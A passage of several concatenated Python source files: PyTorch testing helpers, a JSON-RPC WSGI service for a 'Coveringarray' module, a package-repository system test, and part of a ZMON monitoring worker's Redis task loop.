test_case.id(), running_script_path, test_case_class_file)
def load_tests(loader, tests, pattern):
set_running_script_path()
test_suite = unittest.TestSuite()
for test_group in tests:
for test in test_group:
check_test_defined_in_running_script(test)
test_suite.addTest(test)
return test_suite
class BytesIOContext(io.BytesIO):
def __enter__(self):
return self
def __exit__(self, *args):
pass
# Tentative value for nondet_tol for gradcheck when backward implementation
# relies on nondeterministic operations, i.e., those listed here:
# https://pytorch.org/docs/stable/generated/torch.use_deterministic_algorithms.html
#
# For more information see https://github.com/pytorch/pytorch/issues/56202
GRADCHECK_NONDET_TOL = 1e-12
def gradcheck(fn, inputs, **kwargs):
# Wrapper around gradcheck that enables certain keys by default.
# Use this testing-internal gradcheck instead of autograd.gradcheck so that new features like vmap and
# forward-mode AD are tested by default. We create this wrapper because we'd like to keep new checks
# to be disabled to default for the public-facing api to avoid breaking user code.
#
# All PyTorch devs doing testing should use this wrapper instead of autograd.gradcheck.
default_values = {
"check_batched_grad": True,
"fast_mode": True,
}
if os.environ.get('PYTORCH_TEST_WITH_SLOW_GRADCHECK', "0FF") == "ON":
default_values["fast_mode"] = False
for key, value in default_values.items():
# default value override values explicitly set to None
k = kwargs.get(key, None)
kwargs[key] = k if k is not None else value
return torch.autograd.gradcheck(fn, inputs, **kwargs)
def gradgradcheck(fn, inputs, grad_outputs=None, **kwargs):
# Wrapper around gradgradcheck that enables certain keys by default
# See gradcheck above for an explanation of why we need something like this.
#
# All PyTorch devs doing testing should use this wrapper instead of autograd.gradgradcheck
default_values = {
"check_batched_grad": True,
"fast_mode": True,
}
if os.environ.get('PYTORCH_TEST_WITH_SLOW_GRADCHECK', "0FF") == "ON":
default_values["fast_mode"] = False
for key, value in default_values.items():
# default value override values explicitly set to None
k = kwargs.get(key, None)
kwargs[key] = k if k is not None else value
return torch.autograd.gradgradcheck(fn, inputs, grad_outputs, **kwargs)
def _assertGradAndGradgradChecks(test_case, apply_fn, inputs, **kwargs):
# call assert function rather than returning a bool since it's nicer
# if we get whether this failed on the gradcheck or the gradgradcheck.
test_case.assertTrue(gradcheck(apply_fn, inputs, **kwargs))
test_case.assertTrue(gradgradcheck(apply_fn, inputs, **kwargs))
@contextmanager
def set_cwd(path: str) -> Iterator[None]:
old_cwd = os.getcwd()
try:
os.chdir(path)
yield
finally:
os.chdir(old_cwd)
# Using @precisionOverride specific to your test is the recommended way
# of doing this. These are just some values that worked for test_nn.
dtype2prec_DONTUSE = {torch.float: 1e-5,
torch.double: 1e-5,
torch.half: 1e-2,
torch.bfloat16: 1e-1}
def _wrap_warn_once(regex):
def decorator(fn):
def inner(self, *args, **kwargs):
with self.assertWarnsOnceRegex(UserWarning, regex):
fn(self, *args, **kwargs)
return inner
return decorator
# This is a wrapper that wraps a test to run this test twice, one with
# coalesced=True, another with coalesced=False for coalesced/uncoalesced sparse tensors.
def coalescedonoff(f):
@wraps(f)
def wrapped(self, *args, **kwargs):
f(self, *args, **kwargs, coalesced=True)
f(self, *args, **kwargs, coalesced=False)
return wrapped
@contextlib.contextmanager
def disable_gc():
if gc.isenabled():
try:
gc.disable()
yield
finally:
gc.enable()
else:
yield
def find_library_location(lib_name: str) -> Path:
# return the shared library file in the installed folder if exist,
# else the file in the build folder
torch_root = Path(torch.__file__).resolve().parent
path = torch_root / 'lib' / lib_name
if os.path.exists(path):
return path
torch_root = Path(__file__).resolve().parent.parent.parent
return torch_root / 'build' / 'lib' / lib_name
def sandcastle_skip(reason):
"""
Similar to unittest.skip, however in the sandcastle environment it just
"passes" the test instead to avoid creating tasks complaining about tests
skipping continuously.
"""
def decorator(func):
if not IS_SANDCASTLE:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = reason
return func
@wraps(func)
def wrapper(*args, **kwargs):
print(f'Skipping {func.__name__} on sandcastle for following reason: {reason}', file=sys.stderr)
return
return wrapper
return decorator
def mock_wrapper(method):
"""
Returns a function that calls the real implementation of a method
in addition to passing args to a mock object.
"""
mock = MagicMock()
@wraps(method)
def wrapper(self, *args, **kwargs):
mock(*args, **kwargs)
return method(self, *args, **kwargs)
wrapper.mock = mock # type: ignore[attr-defined]
return wrapper
def get_tensors_from(args, kwargs):
""" Returns a set of all Tensor objects in the given args and kwargs. """
return set([arg for arg in args if isinstance(arg, Tensor)] +
[v for v in kwargs.values() if isinstance(v, Tensor)])
# Returns scalar tensor representation of a list of integer byte values
def bytes_to_scalar(byte_list: List[int], dtype: torch.dtype, device: torch.device):
dtype_to_ctype: Dict[torch.dtype, Any] = {
torch.int8: ctypes.c_int8,
torch.uint8: ctypes.c_uint8,
torch.int16: ctypes.c_int16,
torch.int32: ctypes.c_int32,
torch.int64: ctypes.c_int64,
torch.bool: ctypes.c_bool,
torch.float32: ctypes.c_float,
torch.complex64: ctypes.c_float,
torch.float64: ctypes.c_double,
torch.complex128: ctypes.c_double,
}
ctype = dtype_to_ctype[dtype]
num_bytes = ctypes.sizeof(ctype)
def check_bytes(byte_list):
for byte in byte_list:
assert 0 <= byte <= 255
if dtype.is_complex:
assert len(byte_list) == (num_bytes * 2)
check_bytes(byte_list)
real = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list[:num_bytes])).value
imag = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list[num_bytes:])).value
res = real + 1j * imag
else:
assert len(byte_list) == num_bytes
check_bytes(byte_list)
res = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list)).value
return torch.tensor(res, device=device, dtype=dtype)
def has_breakpad():
# We always build with breakpad in CI
if IS_IN_CI:
return True
# If not on a special build, check that the library was actually linked in
try:
torch._C._get_minidump_directory() # type: ignore[attr-defined]
return True
except RuntimeError as e:
if "Minidump handler is uninintialized" in str(e):
return True
return False
def sandcastle_skip_if(condition, reason):
"""
Similar to unittest.skipIf, however in the sandcastle environment it just
"passes" the test instead to avoid creating tasks complaining about tests
skipping continuously.
"""
def decorator(func):
if not IS_SANDCASTLE and condition:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = reason
return func
@wraps(func)
def wrapper(*args, **kwargs):
if condition and IS_SANDCASTLE:
print(f'Skipping {func.__name__} on sandcastle for following reason: {reason}', file=sys.stderr)
return
else:
return func(*args, **kwargs)
return wrapper
return decorator
def dtype_name(dtype):
""" Returns the pretty name of the dtype (e.g. torch.int64 -> int64). """
return str(dtype).split('.')[1]
def set_single_threaded_if_parallel_tbb(fn):
"""Set test to be single threaded for parallel tbb.
See https://github.com/pytorch/pytorch/issues/64571#issuecomment-914691883
"""
if not IS_TBB:
return fn
@wraps(fn)
def wrap_fn(*args, **kwargs):
num_threads = torch.get_num_threads()
torch.set_num_threads(1)
try:
return fn(*args, **kwargs)
finally:
torch.set_num_threads(num_threads)
return wrap_fn
@functools.lru_cache()
def get_cycles_per_ms() -> float:
"""Measure and return approximate number of cycles per millisecond for torch.cuda._sleep
"""
def measure() -> float:
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.cuda._sleep(1000000)
end.record()
end.synchronize()
cycles_per_ms = 1000000 / start.elapsed_time(end)
return cycles_per_ms
# Get 10 values and remove the 2 max and 2 min and return the avg.
# This is to avoid system disturbance that skew the results, e.g.
# the very first cuda call likely does a bunch of init, which takes
# much longer than subsequent calls.
#
# Tested on both Tesla V100, Quadro GP100, Titan RTX, RTX 3090 GPUs
# and seems to return stable values. Therefore, we enable caching
# using lru_cache decorator above.
num = 10
vals = []
for _ in range(num):
vals.append(measure())
vals = sorted(vals)
return mean(vals[2 : num - 2])
|
CoveringarrayServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from Coveringarray.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'Coveringarray'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from Coveringarray.CoveringarrayImpl import Coveringarray # noqa @IgnorePep8
impl_Coveringarray = Coveringarray(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'Coveringarray'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_Coveringarray.run_Coveringarray,
name='Coveringarray.run_Coveringarray',
types=[dict])
self.method_authentication['Coveringarray.run_Coveringarray'] = 'required' # noqa
self.rpc_service.add(impl_Coveringarray.status,
name='Coveringarray.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'Coveringarray ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
run_system_test.py
|
"""
Copyright (c) 2016 Cisco and/or its affiliates.
This software is licensed to you under the terms of the Apache License, Version 2.0 (the "License").
You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
The code, technical concepts, and all information contained herein, are the property of Cisco Technology, Inc.
and/or its affiliated entities, under various laws including copyright, international treaties, patent, and/or contract.
Any use of the material herein must be in accordance with the terms of the License.
All rights not expressly granted by the License are reserved.
Unless required by applicable law or agreed to separately in writing, software distributed under the License is
distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
Purpose: runs system tests on the rest server
"""
import json
import threading
import time
from package_repository_rest_server import PackageRepositoryRestServer
from package_repo_rest_client import PackageRepoRestClient
def run_system_tests(api_url):
print("Running system tests for: " + api_url)
test_package = "test_temp_sr_system_test-0.0.2.tar.gz"
old_test_package = "test_temp_sr_system_test-0.0.1.tar.gz"
old_test_package_data = "some older dummy data: " + str(time.time())
test_package_data = "some dummy data: " + str(time.time())
client = PackageRepoRestClient("http://localhost:8888")
# test a bad package in repository
client.get_package("ThisPackageShouldReallyNotExist", [404])
# testing putting a new package in the repository:
client.put_package(test_package, test_package_data)
# get the package data from the repository:
downloaded_package_contents = client.get_package(test_package)
# make sure that the package contents match what we just posted
assert downloaded_package_contents == test_package_data
# test package listing:
client.put_package(old_test_package, old_test_package_data)
package_list = client.get_package_list(recency=1)
assert is_package_in_package_list(test_package, package_list)
# older version of test package should not be in list with a recency of a single version
assert not is_package_in_package_list(old_test_package, package_list)
# get more versions of each package:
package_list2 = client.get_package_list(recency=2)
# older version of test package should be in list with a recency of a 2 versions
assert is_package_in_package_list(old_test_package, package_list2)
# finsihed testing:
print("TESTS SUCCEEDED!!!")
def is_package_in_package_list(package_name, package_list):
"""
:returns true if package_name exists in package_list
"""
package_found_in_list = False
for item in package_list:
versions = item["latest_versions"]
for version in versions:
file_name = version["file"]
if file_name == package_name:
package_found_in_list = True
return package_found_in_list
if __name__ == "__main__":
print("Configuring test server...")
with open('../pr-config.json', 'r') as f:
CONFIG = json.load(f)
TEST_SERVER = PackageRepositoryRestServer(configuration=CONFIG)
try:
threading.Thread(target=lambda: TEST_SERVER.run()).start()
TEST_SERVER.wait_for_server_to_start()
run_system_tests("http://localhost:8888")
finally:
TEST_SERVER.stop()
|
workflow.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import base64
import json
import logging
import os
import sys
import threading
import time
from contextlib import contextmanager
from copy import deepcopy
from datetime import datetime, timedelta
from operator import itemgetter
from random import random
from traceback import format_exc
import opentracing
import requests
import setproctitle
import snappy
import tokens
import settings
from redis_context_manager import RedisConnHandler
from rpc_client import get_rpc_client
from tasks import check_and_notify, cleanup, configure_tasks, trial_run
from zmon_worker_monitor import eventloghttp
from zmon_worker_monitor.zmon_worker.common.tracing import extract_tracing_span
from zmon_worker_monitor.zmon_worker.common.utils import get_process_cmdline
logger = logging.getLogger(__name__)
TASK_POP_TIMEOUT = 5
OPENTRACING_TAG_QUEUE_RESULT = 'worker_task_result'
OPENTRACING_QUEUE_OPERATION = 'worker_task_processing'
OPENTRACING_TASK_EXPIRATION = 'worker_task_expire_time'
SAMPLING_RATE_UPDATE_DURATION = 60
SAMPLING_RATE_ENTITY_ID = 'zmon-sampling-rate'
__config = None
# We manage uid tokens once when we import
tokens.manage('uid', ['uid'])
def get_sampling_rate_config(config, current_span):
"""
Get sampling rate config from a ZMON entity or config vars.
Entity:
{
"id": "zmon-sampling-rate",
"type": "zmon_config",
"default_sampling": 100,
"critical_checks": [13, 14, 19],
"worker_sampling": {
"account-1": 50,
"account-2": 60,
"account-3": 0
}
}
"""
default_sampling = int(config.get('zmon.sampling.rate', 100))
critical_checks = config.get('zmon.critical.checks')
if type(critical_checks) is not list:
critical_checks = critical_checks.replace(' ', '').split(',')
sampling_config = {
'default_sampling': default_sampling,
'critical_checks': critical_checks
}
# We try to get sampling rate entity!
zmon_url = config.get('zmon.url')
if not zmon_url:
current_span.set_tag('sampling_entity_used', False)
else:
current_span.set_tag('sampling_entity_used', True)
try:
url = '{}/api/v1/entities/{}'.format(zmon_url, SAMPLING_RATE_ENTITY_ID)
headers = {'Authorization': 'Bearer {}'.format(tokens.get('uid'))}
resp = requests.get(url, headers=headers, timeout=2)
resp.raise_for_status()
entity = resp.json()
sampling_config.update(entity)
except Exception:
current_span.set_tag('sampling_entity_used', False)
current_span.log_kv({'exception': format_exc()})
return sampling_config
def get_config():
global __config
if __config is None:
__config = settings.get_external_config()
return __config
def flow_simple_queue_processor(queue='', **execution_context):
'''
Simple logic to connect to a redis queue, listen to messages, decode them and execute the tasks
:param queue: (str) queue to connect to
:param execution_context: (dict) other kwargs that may have been passed when worker was spawn
:return:
Some info to understand celery messages:
1. An example of a celery message as first received (base64-encoded body shortened):
('zmon:queue:default',
'{
"body": "eyJleHBpcm...t9fQ==", "headers": {}, "content-type": "application/json",
"properties": {
"body_encoding": "base64",
"correlation_id": "check-277-de_zalando:access-control-kit-1409826332.92",
"reply_to": "abc5c87f-74eb-3570-a1cf-e426eaf91ca7",
"delivery_info": {
"priority": 0,
"routing_key": "default",
"exchange": "zmon"
},
"delivery_mode": 2,
"delivery_tag": "94288433-cb4e-4d33-be29-c63e2bbce39a"
},
"content-encoding": "utf-8"}'
)
2. An example of the message['body'] after being base64-decoded (args list shortened):
{
u'utc': True,
u'chord': None,
u'args': [{u'check_id': 277, u'interval': 60, u'entity': {u'instance_type': u'zomcat', ...}, u'condition': u'>100', ...}], # noqa
u'retries': 0,
u'expires': u'2014-09-04T10:27:32.919152+00:00',
u'task': u'check_and_notify',
u'callbacks': None,
u'errbacks': None,
u'timelimit': [90, 60],
u'taskset': None,
u'kwargs': {},
u'eta': None,
u'id': u'check-277-de_zalando:access-control-kit-1409826332.92'
}
'''
known_tasks = {'check_and_notify': check_and_notify, 'trial_run': trial_run, 'cleanup': cleanup}
# get configuration and configure tasks
config = get_config()
configure_tasks(config)
logger.info('Connecting simple_queue_consumer to queue=%s, execution_context=%s', queue, execution_context)
RedisConnHandler.configure(**dict(config))
eventloghttp.set_target_host(config.get('eventlog.host', 'localhost'), config.get('eventlog.port', 8081))
eventloghttp.enable_http(config.get('eventlog.http', False))
reactor = FlowControlReactor.get_instance()
conn_handler = RedisConnHandler.get_instance()
expired_count = 0
count = 0
sampling_rate_last_updated = datetime.utcnow()
sampling_config = None
sampling_update_rate = int(config.get('zmon.sampling.update.rate', SAMPLING_RATE_UPDATE_DURATION))
while True:
try:
with conn_handler as ch:
r_conn = ch.get_healthy_conn()
encoded_task = r_conn.blpop(queue, TASK_POP_TIMEOUT)
if encoded_task is None:
raise ch.IdleLoopException('No task received')
queue, msg = encoded_task
if msg[:1] != '{':
msg = snappy.decompress(msg)
msg_obj = json.loads(msg)
# OpenTracing: picking up trace from scheduler
trace = msg_obj.get('properties', {}).get('trace', {})
span = extract_tracing_span(trace)
span.set_operation_name(OPENTRACING_QUEUE_OPERATION)
# Get sampling rates. We update every minute.
if sampling_config is None or (
(datetime.utcnow() - sampling_rate_last_updated).seconds > sampling_update_rate):
try:
sampling_rate_last_updated = datetime.utcnow()
sampling_config = get_sampling_rate_config(config, span)
span.log_kv({'sampling_config': sampling_config})
span.set_tag('sampling_rate_updated', True)
except Exception:
span.set_tag('sampling_rate_updated', False)
span.log_kv({'exception': format_exc()})
with span:
try:
is_processed = process_message(
queue, known_tasks, reactor, msg_obj, current_span=span, sampling_config=sampling_config)
if is_processed:
span.set_tag(OPENTRACING_TAG_QUEUE_RESULT, 'success')
else:
span.set_tag(OPENTRACING_TAG_QUEUE_RESULT, 'expired')
expired_count += 1
if expired_count % 500 == 0:
logger.warning('expired tasks count: %s', expired_count)
except Exception:
span.set_tag(OPENTRACING_TAG_QUEUE_RESULT, 'error')
span.set_tag('error', True)
span.log_kv({'exception': format_exc()})
count += 1
except Exception:
logger.exception('Exception in redis loop. Details: ')
try:
span = opentracing.tracer.start_span(operation_name='worker_redis_loop')
with span:
span.set_tag('error', True)
span.log_kv({'exception': format_exc()})
